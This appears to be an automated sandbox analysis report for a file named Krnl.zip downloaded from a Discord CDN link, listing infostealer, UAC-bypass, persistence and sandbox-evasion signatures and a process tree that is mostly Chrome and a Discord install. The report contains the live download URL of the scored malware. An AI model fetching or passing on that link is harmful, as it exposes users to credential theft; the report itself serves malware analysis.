Analysis
-
max time kernel
1800s -
max time network
1803s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
19/12/2022, 17:13
General
-
Target
https://cdn.discordapp.com/attachments/1045003118900940843/1054445358895353876/Krnl.zip
Score
10/10
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
UAC bypass 3 TTPs 3 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 21 IoCs
-
Executes dropped EXE 64 IoCs
-
Registers COM server for autorun 1 TTPs 64 IoCs
-
Sets service image path in registry 2 TTPs 2 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 22 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 12 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 19 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 22 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 53 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 26 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates processes with tasklist 1 TTPs 47 IoCs
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Kills process with taskkill 14 IoCs
-
Modifies Internet Explorer settings 1 TTPs 6 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 20 IoCs
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 7 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 5 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 33 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://cdn.discordapp.com/attachments/1045003118900940843/1054445358895353876/Krnl.zip2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffae58a4f50,0x7ffae58a4f60,0x7ffae58a4f703⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1624 /prefetch:23⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1988 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2388 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3040 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3064 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4332 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4468 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4352 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5160 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5168 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5452 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5276 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6220 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6088 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5904 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6048 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6516 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6192 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6052 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6056 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4556 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6088 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1616,13380653609115266218,290649768666354126,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5776 /prefetch:83⤵
-
-
C:\Users\Admin\Downloads\DiscordSetup.exe"C:\Users\Admin\Downloads\DiscordSetup.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe"C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe" --install .4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --squirrel-install 1.0.90085⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exeC:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Roaming\discord /prefetch:7 --no-rate-limit --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Roaming\discord\Crashpad --url=https://sentry.io/api/146342/minidump/?sentry_key=384ce4413de74fe0be270abe03b2b35a "--annotation=_companyName=Discord Inc." --annotation=_productName=Discord --annotation=_version=1.0.9008 --annotation=prod=Electron --annotation=ver=13.6.6 --initial-client-data=0x470,0x474,0x478,0x46c,0x47c,0x7a83850,0x7a83860,0x7a8386c6⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Discord\Update.exeC:\Users\Admin\AppData\Local\Discord\Update.exe --createShortcut Discord.exe --setupIcon C:\Users\Admin\AppData\Local\Discord\app.ico6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=gpu-process --field-trial-handle=1760,1440645201626933136,3920480306203372435,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1764 /prefetch:26⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1760,1440645201626933136,3920480306203372435,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 /prefetch:86⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Discord /d "C:\Users\Admin\AppData\Local\Discord\Update.exe --processStart Discord.exe" /f6⤵
- Adds Run key to start application
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKCU\Software\Classes\Discord /ve /d "URL:Discord Protocol" /f6⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKCU\Software\Classes\Discord /v "URL Protocol" /f6⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKCU\Software\Classes\Discord\DefaultIcon /ve /d "\"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe\",-1" /f6⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKCU\Software\Classes\Discord\shell\open\command /ve /d "\"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe\" --url -- \"%1\"" /f6⤵
- Modifies registry key
-
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --squirrel-firstrun5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exeC:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Roaming\discord /prefetch:7 --no-rate-limit --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Roaming\discord\Crashpad --url=https://sentry.io/api/146342/minidump/?sentry_key=384ce4413de74fe0be270abe03b2b35a "--annotation=_companyName=Discord Inc." --annotation=_productName=Discord --annotation=_version=1.0.9008 --annotation=prod=Electron --annotation=ver=13.6.6 --initial-client-data=0x464,0x468,0x46c,0x460,0x470,0x7a83850,0x7a83860,0x7a8386c6⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=gpu-process --field-trial-handle=1760,4713964028997742442,7343976799757082738,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1768 /prefetch:26⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKCU\Software\Classes\Discord /ve /d "URL:Discord Protocol" /f6⤵
- Modifies registry key
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1760,4713964028997742442,7343976799757082738,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:86⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=renderer --autoplay-policy=no-user-gesture-required --field-trial-handle=1760,4713964028997742442,7343976799757082738,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\resources\app.asar" --no-sandbox --no-zygote --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2624 /prefetch:16⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKCU\Software\Classes\Discord /v "URL Protocol" /f6⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKCU\Software\Classes\Discord\DefaultIcon /ve /d "\"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe\",-1" /f6⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKCU\Software\Classes\Discord\shell\open\command /ve /d "\"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe\" --url -- \"%1\"" /f6⤵
- Modifies registry key
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=renderer --autoplay-policy=no-user-gesture-required --field-trial-handle=1760,4713964028997742442,7343976799757082738,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-compositing --lang=en-US --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\resources\app.asar" --no-sandbox --no-zygote --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1 --enable-node-leakage-in-renderers6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /q /d /s /c "C:\Program^ Files\NVIDIA^ Corporation\NVSMI\nvidia-smi.exe"7⤵
-
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1760,4713964028997742442,7343976799757082738,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4080 /prefetch:86⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe"C:\Users\Admin\AppData\Local\Discord\app-1.0.9008\Discord.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1760,4713964028997742442,7343976799757082738,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3956 /prefetch:86⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discordapp.com/handoff?rpc=6463&key=f4fc0279-7a2a-4d77-8359-bb3f9dab75d46⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffae2df46f8,0x7ffae2df4708,0x7ffae2df47187⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,9538389921678675469,13321943611602887722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:27⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,9538389921678675469,13321943611602887722,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 /prefetch:37⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,9538389921678675469,13321943611602887722,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3112 /prefetch:87⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,9538389921678675469,13321943611602887722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:17⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,9538389921678675469,13321943611602887722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3844 /prefetch:17⤵
-
-
